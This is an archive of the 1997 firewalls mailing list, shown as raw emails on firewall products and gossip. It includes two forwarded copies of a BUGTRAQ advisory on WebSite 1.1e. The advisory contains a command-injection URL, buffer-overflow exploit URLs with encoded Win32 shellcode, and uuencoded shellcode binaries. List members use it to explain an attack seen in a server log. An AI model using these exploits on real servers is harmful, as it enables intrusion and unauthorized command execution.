talk to in Sun Singapore for FW and SunScreen training? > > What is the mailing list for Checkpoint/Solstice Firewall-1 users? > > > > Thank you very much for your kindness. :-) > > > > Yours, > > Dexter D. Laggui > > Systems Engineer > > > > drexx@sunphil.mozcom.com > > Philippine Systems Products Inc. > > > > > > ----- End Included Message ----- > > > > ----- End Included Message ----- From firewalls-owner Tue Jan 7 20:14:12 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA04342 for firewalls-outgoing; Tue, 7 Jan 1997 19:47:19 -0800 (PST) Received: from mailbox1.standard.com (netnews.stdin.com [198.107.111.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA04314 for ; Tue, 7 Jan 1997 19:46:58 -0800 (PST) Received: from jallen.standard.com (jallen.standard.com [198.182.191.76]) by mailbox1.standard.com (8.7.5/8.7.3) with SMTP id TAA11113; Tue, 7 Jan 1997 19:40:53 -0800 (PST) Date: Tue, 7 Jan 97 19:38:15 -0800 From: John Allen Subject: Re: Multi-FW Gateway management GUI To: "Stout, Bill" , "'Firewall List'" X-Mailer: Chameleon ATX 6.0.1, Standards Based IntraNet Solutions, NetManage Inc. X-Priority: 3 (Normal) References: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk --- On Tue, 7 Jan 1997 13:56:12 -0800 So and So named "Stout, Bill" wrote: > I'm collecting basic requirements for FW-farm management > applications for an internal instructional document. > > What I've thought of so far is the following: > > > BLAH BLAH AND BLAH were said > > Comments? Which are overkill and which should I add? > > Bill Stout > How about a ten million dollar budget - nice bunch of ideas, but you wont get it all to work, I use a product with 1/10 of these features, I paid a lot of money for the ones I have - and they still have bugs. Nice try, You also need strong partnership with key vendors for distribution and support without this - your product will fail even though your product has all these features. Make it Shareware for $39.00, and you will probably make enough to have an Internet account for a few years. Security software is no laughing matter, and it is usually complex, it usually comes with a disclaimer that what ever it doesnt do - isnt covered - and what it is supposed to do - might not do it. Best of luck. =========================================================================== John Allen E-mail:jallen@standard.com Network Development Group Telephone: (503) 321-6189 Standard Insurance, Portland Oregon FAX: (503) 321-7290 > 1. An initial GUI which allows an administrator to view > multiple gateways, ports, alert status, and proxy states. > > 2. The ability to select a proxy and view configuration > information on that proxy on a specific gateway. > > 3. The ability to delegate departmental security. > > 4. The ability to manage individual user authentication > per proxy. > > 5. The ability to centrally view logs. > > 6. The ability to send pages on specific events. > > 7. If located on the same DMZ subnet as the gateways, > the ability to sniff packets and graphically organize > them, other basic network management monitoring. > > 8. A sanity-check utility which looks for obvious proxy > filter configuration errors. > > 9. A tripwire utility to display alerts on file and process > state changes. > > 10. 'Courtney' for farms? > > 11. Instant traceback utility to collect suspicious host > information (DNS data, traceroute, whois, traffic type, > etc). > > 12. Time synchronization verification for accurate log > comparisons. > > 13. Strongly encrypted and authenticated administrative channels. > > 14. Load balancing? > > Comments? Which are overkill and which should I add? > > Bill Stout > ---------------End of Original Message----------------- How about a ten million dollar budget - nice bunch of ideas, but you wont get it all to work, I use a product with 1/10 of these features, I paid a lot of money for the ones I have - and they still have bugs. Nice try, You also need strong partnership with key vendors for distribution and support without this - your product will fail even though your product has all these features. Make it Shareware for $39.00, and you will probably make enough to have an Internet account for a few years. Security software is no laughing matter, and it is usually complex, it usually comes with a disclaimer that what ever it doesnt do - isnt covered - and what it is supposed to do - might not do it. Best of luck. From firewalls-owner Tue Jan 7 20:29:20 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA04930 for firewalls-outgoing; Tue, 7 Jan 1997 19:56:45 -0800 (PST) Received: from dhp.com (dhp.com [199.245.105.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA04899 for ; Tue, 7 Jan 1997 19:56:31 -0800 (PST) Received: (from lucifer@localhost) by dhp.com (8.8.4/8.6.12) id WAA20700; Tue, 7 Jan 1997 22:10:40 -0500 Date: Tue, 7 Jan 1997 22:10:40 -0500 Message-Id: <199701080310.WAA20700@dhp.com> To: firewalls@greatcircle.com From: Mixmaster X-Comment1: This message did not originate from the X-Comment2: above address. It was automatically remailed X-Comment3: by an anonymous mail service. Please report X-Comment4: problems or inappropriate use to X-Comment5: Subject: IS Wilner@DOCKMASTER.NCSC.MIL A NET.LOON Sender: firewalls-owner@GreatCircle.COM Precedence: bulk To: firewalls@greatcircle.com cc: Subject: IS Wilner@DOCKMASTER.NCSC.MIL A NET.LOON -------- Some people thinks they are O/S gods just because of a DOCKMASTER address... since WILNER thinks this is a reason to conduct ad-hominem attacks on members of the firewalls list such as MJR(who was around LONG before wilner) I am starting to question whether Wilner@DOCKMASTER.NCSC.MIL is really the NET.LOON Dr. Fred Cohen in Disguise? Anon p.s. Sorry for the noise listmaster!! From firewalls-owner Tue Jan 7 20:45:59 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA01705 for firewalls-outgoing; Tue, 7 Jan 1997 19:08:02 -0800 (PST) Received: from mule1.mindspring.com (mule1.mindspring.com [204.180.128.167]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA01671 for ; Tue, 7 Jan 1997 19:07:36 -0800 (PST) Received: from [207.69.170.21] (user-37kbahh.dialup.mindspring.com [207.69.170.49]) by mule1.mindspring.com (8.8.4/8.8.4) with SMTP id WAA33798; Tue, 7 Jan 1997 22:05:59 -0500 Date: Tue, 7 Jan 1997 22:05:59 -0500 X-Sender: pelicans@pop.mindspring.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Wilner@DOCKMASTER.NCSC.MIL From: pelicans@mindspring.com (BeachCruiser) Subject: Re: Re: NCSA != NCSC Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 2:53 PM 1/7/97, Wilner@DOCKMASTER.NCSC.MIL wrote: >> I have to say up front that I agree with MJR. >> >> . . . if the firewall software is implemented below the O/S layer >> . . . then the O/S will never even "see" . . . > >Everything except boot-up depends upon the O/S. Nothing is below the "O/S >layer," nor does one speak of such a layer unless one intends "application >layer" and doesn't know an application from an O/S, nor can a single byte be >sent or retrieved over a device (networked or otherwise) unless an O/S is >relied upon, nor can a single access to memory, disk, or what-have-you be >performed by networking code "below the O/S layer," as we so quaintly say, >if there is no O/S involved. > >Gentlemen, if this represents your understanding of operating systems and >security, please contribute to alt.brush-sellers, not to firewalls. Easy Bruce, this is only firewalls at Mr. Rogers Neighborhood, not INFOSEC up at 20755. :) :) :) ___________________________ Bob McKisson Director of Cooth & Decorum Cypress Systems Corporation Virginia Beach, VA 23451 (757) 425-4195 Voice (757) 425-4196 FAX (757) 442-0888 STU-III pelicans@mindspring.com I don't give them hell...I just give them the truth, and they think it's hell. - Harry Truman From firewalls-owner Tue Jan 7 20:59:29 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA08565 for firewalls-outgoing; Tue, 7 Jan 1997 20:50:45 -0800 (PST) Received: from ginger.vnet.net (ginger.vnet.net [166.82.1.69]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id UAA08523 for ; Tue, 7 Jan 1997 20:50:22 -0800 (PST) Received: from jimi.vnet.net (jimi.vnet.net [166.82.1.19]) by ginger.vnet.net (8.8.4/8.8.2) with ESMTP id XAA01217 for ; Tue, 7 Jan 1997 23:50:52 -0500 (EST) Received: from sdg (galip.vnet.net [166.82.174.200]) by jimi.vnet.net (8.8.4/8.8.4) with SMTP id WAA13206 for ; Tue, 7 Jan 1997 22:06:47 -0500 (EST) Message-ID: <32D30E6B.79D2@hon.com> Date: Tue, 07 Jan 1997 22:03:07 -0500 From: Steve Reply-To: Steve@hon.com Organization: sdg consulting X-Mailer: Mozilla 3.01Gold (WinNT; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: Log entry Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, Recently, I recorded a log entry that was _very_ unusual and if someone could advise where I might seek information on deciphering entries such as the below it would be muchly appreciated. A book, white paper, anything.. 207.91.166.17 www.(snip).com - [07/Jan/1997:19:56:50 -0500] "GET /cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10%FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D HTTP/1.0" 500 0 "" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)" I believe this connection also caused a Watson error. The only exe I am running is for my hit counter. Thanks in advance Steve Steve@hon.com From firewalls-owner Tue Jan 7 21:21:22 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA25315 for firewalls-outgoing; Tue, 7 Jan 1997 17:51:50 -0800 (PST) Received: from elm.ncs.com.sg (elm.ncs.com.sg [203.116.16.17]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id RAA25306 for ; Tue, 7 Jan 1997 17:51:38 -0800 (PST) Received: from Henry.ncs.com.sg (thunder.ncs.com.sg [203.116.16.66]) by elm.ncs.com.sg (8.7.3/8.7.3) with SMTP id JAA27672; Wed, 8 Jan 1997 09:41:28 +0800 (SGT) Message-ID: <32D2FC75.7696@ncs.com.sg> Date: Wed, 08 Jan 1997 09:46:29 +0800 From: Henry Lim Chee Wee Organization: National Computer Systems Pte Ltd X-Mailer: Mozilla 3.0Gold (Win95; I) MIME-Version: 1.0 To: "Starkweather, Mike" CC: firewalls@GreatCircle.COM Subject: Re: Pointcast References: Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Starkweather, Mike wrote: > > I am wondering how the members of this mail list have handled the > flood of traffic generated by Pointcast. It has buried our firewall > (Tis Toolkit) with the huge number of requests it generates. Their > I-Server seems to help some but not as much as I had hoped. > > If this is the wrong place for this question please redirect me. > > Mike Starkweather > Anheuser-Busch This is not much of a firewall question, but... If you are using I-Server from PointCast, then you should be able to put the server directly to the firewall, downloading pointcast's information at regular intervals of the day. That will only constitute one request on the firewall per download. Subsequently, all of your users should download the information from the I-Server and NOT directly from PointCast. However, remember to ask your users to upgrade their pointcast client to version 1.1. On the finer details, you can check it out at : http://www.pointcast.com/support/iserver/faqs/cliredir.html -- _ 0 (_| |(_~|^~~| "I-dare-you geysering forth with TT/_ T"T heartacious good will" ^^^^^^^^^^^^^^nitro ^^^^^^^^^^^^^ ćććććććć A Happy New Year To All !!! ćććććććć From firewalls-owner Tue Jan 7 22:29:45 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA15964 for firewalls-outgoing; Tue, 7 Jan 1997 21:55:08 -0800 (PST) Received: from news2.mnsinc.com (news2.mnsinc.com [206.55.3.16]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id VAA15903 for ; Tue, 7 Jan 1997 21:54:49 -0800 (PST) Received: from matrix.erols.com (smanning.mnsinc.com [206.239.28.60]) by news2.mnsinc.com (8.8.3/8.7.3) with SMTP id AAA17354 for ; Wed, 8 Jan 1997 00:54:23 -0500 (EST) Message-Id: <199701080554.AAA17354@news2.mnsinc.com> Comments: Authenticated sender is From: "matrix" To: Date: Wed, 8 Jan 1997 00:51:01 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: USAF: how it was hacked In-reply-to: <199701080136.UAA14304@unix1.sysnet.net> X-mailer: Pegasus Mail for Win32 (v2.50) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Matthew Patton wrote... > > Really quite anticlimatic. The infamous phf script was left active on > the server and was how they got in. Root, the whole 9 yards. Really? What are these statements based on? Could we please keep the rumors to a dull roar? Thanks! Stephen Manning, Special Agent Computer Crime Investigator Air Force Office of Special Investigations Voice: (301) 981-5469 - Fax: (301) 981-3087 From firewalls-owner Tue Jan 7 22:44:07 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA17448 for firewalls-outgoing; Tue, 7 Jan 1997 22:05:56 -0800 (PST) Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [204.246.65.62]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id WAA17412 for ; Tue, 7 Jan 1997 22:05:39 -0800 (PST) Received: from parka.winternet.com (dufresne@parka.winternet.com [198.174.169.9]) by darkstar.sysinfo.com (8.8.2/8.8.2) with SMTP id AAA03757; Wed, 8 Jan 1997 00:07:00 -0600 Date: Tue, 7 Jan 1997 23:59:49 -0600 (CST) From: Ron DuFresne To: Steve cc: firewalls@GreatCircle.COM Subject: Re: Log entry In-Reply-To: <32D30E6B.79D2@hon.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 7 Jan 1997, Steve wrote: > Hi, > > Recently, I recorded a log entry that was _very_ unusual and if someone > could advise where I might seek information on deciphering entries such > as the below it would be muchly appreciated. A book, white paper, > anything.. > > 207.91.166.17 www.(snip).com - [07/Jan/1997:19:56:50 -0500] "GET > /cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10%FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D > HTTP/1.0" 500 0 "" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)" > > I believe this connection also caused a Watson error. The only exe I am > running is for my hit counter. > >From solar@ideal.ruTue Jan 7 23:58:13 1997 Date: Mon, 6 Jan 1997 20:56:21 -0500 From: solar@ideal.ru To: Multiple recipients of list BUGTRAQ Resent-Date: Wed, 8 Jan 1997 00:04:23 -0600 (CST) Resent-From: "R. DuFresne" Resent-To: Ron DuFresne Resent-Subject: Resent mail.... Hi! Actually, this message is about buffer overflows in Windows, in general. But let me put some exploits in here first. I just happened to check out WebSite v1.1e for Windows NT and '95. There're some nice security holes there, in the CGI example programs (should I say - "as usual"?). The first thing that I noticed is about the scripts, they have the following lines in cgi-dos/args.cmd (and some others): > rem NEVER NEVER ECHO URL COMPONENTS UNQUOTED!!! Consider > rem a query string of xxx&del+/s+c:\*.* Your hard drive gets > rem erased!! Same goes for args and extra path info!!! and then some lines like this: > echo QUERY_STRING="%QUERY_STRING%" Obviously, just using the quotes is not enough. Why can't I close them, or use a linefeed? The exploit can be: http://website.host/cgi-dos/args.cmd?"&any+dos+command" Well, the stuff I just told about might be too obvious, some sysadmins I know already have all the example scripts removed. Now, let's get to the interesting stuff. There's also an example C program, compiled to cgi-shl/win-c-sample.exe, with the source provided in cgi-src/win-c-sample/win-c-sample.c, and the following line in there: > char *argv[32]; // Max 32 command line args That's a WinMain local variable, and is passed to SplitArgs(), which does no bounds checking while filling it with the command line parameters. You know what that means -- a nice buffer overflow. Here are the exploits (I split the long URLs into several lines), you can use any dos command in them (replace spaces with _'s): -- WinNT (any version?): http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+- +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A %06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10% FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy _\WebSite\readme.1st_\WebSite\htdocs\x1.htm -- Win95 (the release version only, will crash others!): http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+- +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A %06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%0 3%CA%FF%D1c:\command.com_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\ x1.htm The example dos commands just copy the WebSite's readme.1st file, so you can later check if the exploit worked by trying http://website.host/x1.htm. Note that the server should respond to these exploits with an "Error: no blank line separating header and data", because of the "1 file(s) copied" message appearing without a blank line before it (which is required for HTTP; if you need a command's output, you can redirect it to a file, and get that file via HTTP with a separate request). Finally, to the thing I'm writing this message for -- I mean the Win32 shellcode. I haven't seen any Win32 overflow exploits before (actually, didn't look for them), so I had to code my own shellcode. This seems not to be that simple as it would be for Win16, or as it is for most UNIX systems. The problem is that normally Windows kernel calls require extra relocation items, but the shellcode appears in an already loaded program. The solution I used in the exploits above is doing a call to fixed kernel offset. Actually, the WinNT exploit does pattern searches in the kernel (due to the number of different kernel versions out there), while the Win95 one uses fixed offsets (I don't have Win95 myself, thanks must go to Lord Byte for loading his WinIce and telling me the offsets). The two functions I use are WinExec and ExitProcess. Here're the two shellcodes in binary, uuencoded, so you can use them in your own exploits if you wish. begin 644 shell_nt.bin M:%Y8_^;_U(/&3&H!5HH&/%]U`X`N/T9!283`=?!H,!#P=UEH35QY6U@%,%!Z F4$$Y`77P@^D0_]%H,!#P=UEHT%!V3%@%,#!V4$$Y`77P@^D<_]'[ ` end begin 644 shell_95.bin M:%Y8_^;_U(/&,FH!5HH&/%]U`X`N/T9!283`=?"Z=&]\7[ET8'U@`\K_T;I8 ,7WQ?N5A0?&`#RO_1 ` end Note that I had to avoid using some codes (which the server didn't allow me to use), that's why I do things like: db 68h ; push imm32 pop esi ; \ pop eax ; | - the value being pushed jmp esi ; / call esp instead of: call $+5 ; would contain zeroes pop esi Have fun disassembling. I'll appreciate any suggestions on doing the kernel calls a better way. As for the holes -- the fix is obvious, just remove the examples after you, the webmaster, have checked them out. Also, the holes will probably get fixed in the next WebSite release (I wonder if they credit me;-). BTW, they didn't even have the quotes in scripts I mentioned above, in some earlier versions. Signed, Solar Designer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From firewalls-owner Tue Jan 7 23:31:03 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA23258 for firewalls-outgoing; Tue, 7 Jan 1997 23:23:14 -0800 (PST) Received: from ginger.vnet.net (ginger.vnet.net [166.82.1.69]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id XAA23225 for ; Tue, 7 Jan 1997 23:22:57 -0800 (PST) Received: from jimi.vnet.net (jimi.vnet.net [166.82.1.19]) by ginger.vnet.net (8.8.4/8.8.2) with ESMTP id CAA11294 for ; Wed, 8 Jan 1997 02:23:25 -0500 (EST) Received: from sdg (galip.vnet.net [166.82.174.200]) by jimi.vnet.net (8.8.4/8.8.4) with SMTP id CAA21415 for ; Wed, 8 Jan 1997 02:22:40 -0500 (EST) Message-ID: <32D34A61.230B@hon.com> Date: Wed, 08 Jan 1997 02:18:57 -0500 From: Steve Gallipeau Reply-To: Steve@hon.com Organization: sdg consulting X-Mailer: Mozilla 3.01Gold (WinNT; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: Re: Log Entry Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk All, Thank you for the many responses..much faster then even CERT! As it turns out, I had been corresponding with someone regarding the security of my site and had asked him to take a look at it. Although in this case, a false alarm, it sure woke me up to the fact that I need to make things a lot more secure. Thanks again. Steve Steve@hon.com From firewalls-owner Wed Jan 8 00:04:17 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA25077 for firewalls-outgoing; Tue, 7 Jan 1997 23:49:33 -0800 (PST) Received: from thol.vitel.com.sg (thol.vitnet.com.sg [203.120.113.10]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id XAA25054 for ; Tue, 7 Jan 1997 23:49:16 -0800 (PST) Received: by thol.vitel.com.sg (940816.SGI.8.6.9/940406.SGI.AUTO) id QAA06904; Wed, 8 Jan 1997 16:09:06 -0800 Received: from web(172.16.254.20) by thol via smap (v3.0.1) id sma006901; Wed, 8 Jan 97 16:08:38 -0800 Message-ID: <32D43706.41C6@vitnet.com.sg> Date: Wed, 08 Jan 1997 16:08:38 -0800 From: Damien Miller X-Mailer: Mozilla 3.0Gold (X11; I; IRIX 5.3 IP22) MIME-Version: 1.0 To: Steve@hon.com, firewalls@greatcircle.com Subject: Re: Log entry References: <32D30E6B.79D2@hon.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Steve wrote: > > Hi, > > Recently, I recorded a log entry that was _very_ unusual and if someone > could advise where I might seek information on deciphering entries such > as the below it would be muchly appreciated. A book, white paper, > anything.. > > 207.91.166.17 www.(snip).com - [07/Jan/1997:19:56:50 -0500] "GET > /cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10%FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D > HTTP/1.0" 500 0 "" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)" > > I believe this connection also caused a Watson error. The only exe I am > running is for my hit counter. This is an attempt to exploit a buffer overrun in your (WebSite) server. Below is a post made to BUGTRAQ earlier this week. I expect to see more NT buffer overrun exploits now that someone has published shellcodes. Yet more proof that security through obscurity is insufficient. Regards, Damien Miller -- /--------------------------------------------------------------------------\ | Damien Miller --- Technical Consultant Vitnet Pte Ltd (Singapore) | | "Show me a sane man and I will cure him for you" - C. G Jung (1875-1961) | \--------------------------------------------------------------------------/ ---------- Begin forwarded message Subject: Date: Mon, 6 Jan 1997 20:56:21 -0500 From: solar@ideal.ru To: Multiple recipients of list BUGTRAQ Hi! Actually, this message is about buffer overflows in Windows, in general. But let me put some exploits in here first. I just happened to check out WebSite v1.1e for Windows NT and '95. There're some nice security holes there, in the CGI example programs (should I say - "as usual"?). The first thing that I noticed is about the scripts, they have the following lines in cgi-dos/args.cmd (and some others): > rem NEVER NEVER ECHO URL COMPONENTS UNQUOTED!!! Consider > rem a query string of xxx&del+/s+c:\*.* Your hard drive gets > rem erased!! Same goes for args and extra path info!!! and then some lines like this: > echo QUERY_STRING="%QUERY_STRING%" Obviously, just using the quotes is not enough. Why can't I close them, or use a linefeed? The exploit can be: http://website.host/cgi-dos/args.cmd?"&any+dos+command" Well, the stuff I just told about might be too obvious, some sysadmins I know already have all the example scripts removed. Now, let's get to the interesting stuff. There's also an example C program, compiled to cgi-shl/win-c-sample.exe, with the source provided in cgi-src/win-c-sample/win-c-sample.c, and the following line in there: > char *argv[32]; // Max 32 command line args That's a WinMain local variable, and is passed to SplitArgs(), which does no bounds checking while filling it with the command line parameters. You know what that means -- a nice buffer overflow. Here are the exploits (I split the long URLs into several lines), you can use any dos command in them (replace spaces with _'s): -- WinNT (any version?): http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+- +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A %06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10% FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy _\WebSite\readme.1st_\WebSite\htdocs\x1.htm -- Win95 (the release version only, will crash others!): http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+- +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A %06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%0 3%CA%FF%D1c:\command.com_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\ x1.htm The example dos commands just copy the WebSite's readme.1st file, so you can later check if the exploit worked by trying http://website.host/x1.htm. Note that the server should respond to these exploits with an "Error: no blank line separating header and data", because of the "1 file(s) copied" message appearing without a blank line before it (which is required for HTTP; if you need a command's output, you can redirect it to a file, and get that file via HTTP with a separate request). Finally, to the thing I'm writing this message for -- I mean the Win32 shellcode. I haven't seen any Win32 overflow exploits before (actually, didn't look for them), so I had to code my own shellcode. This seems not to be that simple as it would be for Win16, or as it is for most UNIX systems. The problem is that normally Windows kernel calls require extra relocation items, but the shellcode appears in an already loaded program. The solution I used in the exploits above is doing a call to fixed kernel offset. Actually, the WinNT exploit does pattern searches in the kernel (due to the number of different kernel versions out there), while the Win95 one uses fixed offsets (I don't have Win95 myself, thanks must go to Lord Byte for loading his WinIce and telling me the offsets). The two functions I use are WinExec and ExitProcess. Here're the two shellcodes in binary, uuencoded, so you can use them in your own exploits if you wish. [snip] Note that I had to avoid using some codes (which the server didn't allow me to use), that's why I do things like: db 68h ; push imm32 pop esi ; \ pop eax ; | - the value being pushed jmp esi ; / call esp instead of: call $+5 ; would contain zeroes pop esi Have fun disassembling. I'll appreciate any suggestions on doing the kernel calls a better way. As for the holes -- the fix is obvious, just remove the examples after you, the webmaster, have checked them out. Also, the holes will probably get fixed in the next WebSite release (I wonder if they credit me;-). BTW, they didn't even have the quotes in scripts I mentioned above, in some earlier versions. Signed, Solar Designer ---------- From firewalls-owner Wed Jan 8 00:48:36 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA28626 for firewalls-outgoing; Wed, 8 Jan 1997 00:31:07 -0800 (PST) Received: from ns.bcn.servicom.es (ns.bcn.servicom.es [194.106.1.132]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id AAA28572 for ; Wed, 8 Jan 1997 00:30:39 -0800 (PST) From: ricard.scorpion@bcn.servicom.es Received: from ricard.scorpion.com by ns.bcn.servicom.es (8.6.11/FI-3.3) Wed, 8 Jan 1997 09:35:06 +0100 Message-Id: <199701080835.JAA03125@ns.bcn.servicom.es> To: firewalls@greatcircle.com Subject: Fw: Altavista firewall help Date: Wed, 9 Oct 1996 09:27:59 +0100 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1085 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ---------- > From: Ricard Vilata i Salvanera > To: firewalls-owner@GreatCircle.com > Subject: Altavista firewall help > Date: martes 8 de octubre de 1996 5:50 > > Hi, > > I'm evaluating altavista firewall to implement our company internet > security, I want to use two different levels of firewalling: IP filtering > and application proxy. Our platform will be Windows NT. I would like to > use a DMZ implementation with altavista firewall and MS Proxy Server. Can > anybody tell me if I'm wrong ? I don't know nothing about altavista > performance for more than 50 concurrent users. Have you any product > comparation between Altavista and Forewall-1 ? > > Please, can anybody help me with more data or experience ? > > -- > Ricard Vilata > Business Area Manager > ricard.scorpion@bcn.servicom.es > _________________________________ From firewalls-owner Wed Jan 8 01:34:12 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA02927 for firewalls-outgoing; Wed, 8 Jan 1997 01:17:04 -0800 (PST) Received: from kilkenny.tip.net (kilkenny.tip.net [192.36.73.16]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id BAA02893 for ; Wed, 8 Jan 1997 01:16:45 -0800 (PST) Received: from ns.berendsen.com ([194.19.168.20]) by kilkenny.tip.net (8.6.12/8.6.12) with ESMTP id KAA18493 for ; Wed, 8 Jan 1997 10:16:07 +0100 Received: from ns1 (ns1.sbi.net [194.19.168.33]) by ns.berendsen.com (8.7.3/8.7.3) with SMTP id KAA13830 for ; Wed, 8 Jan 1997 10:15:30 +0100 (MET) Message-ID: <32D365DE.41EB@sbi.net> Date: Wed, 08 Jan 1997 10:16:14 +0100 From: michael dreves Organization: Berendsen Components X-Mailer: Mozilla 3.01Gold (X11; I; SunOS 5.5.1 sun4m) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: Re: Firewalls-Digest V6 #8 References: <199701080648.WAA21235@miles.greatcircle.com> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hej s=F8de sus, her kommer flemmings nye e-mail....der er faktisk tale om to addresser, som vi skal proeve: drc@drc.baku.az (Danish Refugee Council. fdr@drc.baku.az (formentelig flemming) kh. -- michael dreves (MD113-RIPE), System Consultant = Berendsen Data, Phone +45-39577300, Fax +45-39577302 Key fingerprint =3D 01 99 2B 6F F1 2E 47 4D 87 6D 98 55 91 42 F8 4D From firewalls-owner Wed Jan 8 01:44:45 1997 Received: (majordom@localhost) by miles.greatcircle.com 